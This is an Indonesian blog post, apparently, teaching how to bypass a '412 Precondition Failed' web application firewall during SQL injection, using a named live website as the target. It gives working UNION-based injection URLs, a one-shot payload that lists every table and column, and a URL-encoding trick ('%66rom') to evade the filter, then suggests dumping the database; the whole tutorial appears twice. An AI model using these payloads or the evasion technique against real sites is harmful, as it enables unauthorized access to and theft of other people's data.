Cara Bypass Sqli 412 Precondition Failed
Oke pada kesempatan kali ini gw mau sharing tutorial Cara Bypass Sqli 412 Precondition Failed.
Pernah gasih kalian pada saat melakukan inject suatu website gatau kenapa tiba-tiba kena WAF sama seperti halnya yang gw alamin saat ini yaitu kena waf 412 precondition failed.
Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi sekarang kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.
Disini gw udah dapat target yang mau di eksekusi atau di bypass, dan ini live targetnya,
http://www.cruiseland.in/houseboat-package-detailed.php?id=5
Selanjutnya langsung saja kita masukan order+by+1-- dan sampai menemukan errornya.
Disini gw mendapatkan errornya diangka 11 berarti jumlah columnnya ada 10.
Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya sampai angka 10 seperti berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--
Dan disini gw mendapatkan angka magicknya 2 dan 5 lebih jelasnya bisa dlihat gambar bawah ini,
Setelah kita mendapatkan angka magicknya, sekarang kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 seperti berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Dan ternyata setelah di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.
Cara bypassnya tinggal ubah huruf f pada " from " dengan url encode seperti ini contohnya,
f=%66
%66rom
Contoh seperti berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.
Sekian dari gue, semoga bermanfaat.
Pernah gasih kalian pada saat melakukan inject suatu website gatau kenapa tiba-tiba kena WAF sama seperti halnya yang gw alamin saat ini yaitu kena waf 412 precondition failed.
Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi sekarang kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.
Disini gw udah dapat target yang mau di eksekusi atau di bypass, dan ini live targetnya,
http://www.cruiseland.in/houseboat-package-detailed.php?id=5
Selanjutnya langsung saja kita masukan order+by+1-- dan sampai menemukan errornya.
Disini gw mendapatkan errornya diangka 11 berarti jumlah columnnya ada 10.
Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya sampai angka 10 seperti berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--
Dan disini gw mendapatkan angka magicknya 2 dan 5 lebih jelasnya bisa dlihat gambar bawah ini,
Setelah kita mendapatkan angka magicknya, sekarang kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 seperti berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Dan ternyata setelah di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.
Cara bypassnya tinggal ubah huruf f pada " from " dengan url encode seperti ini contohnya,
f=%66
%66rom
Contoh seperti berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.
Sekian dari gue, semoga bermanfaat.
This comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteKomentarnya gak ketopik pembahasan, jadi saya hapus karena gajelas ngeshare link/web semacam judi online, poker, dll. Apa faedahnya sih kalo gini bgst hehe
DeleteThis comment has been removed by a blog administrator.
ReplyDelete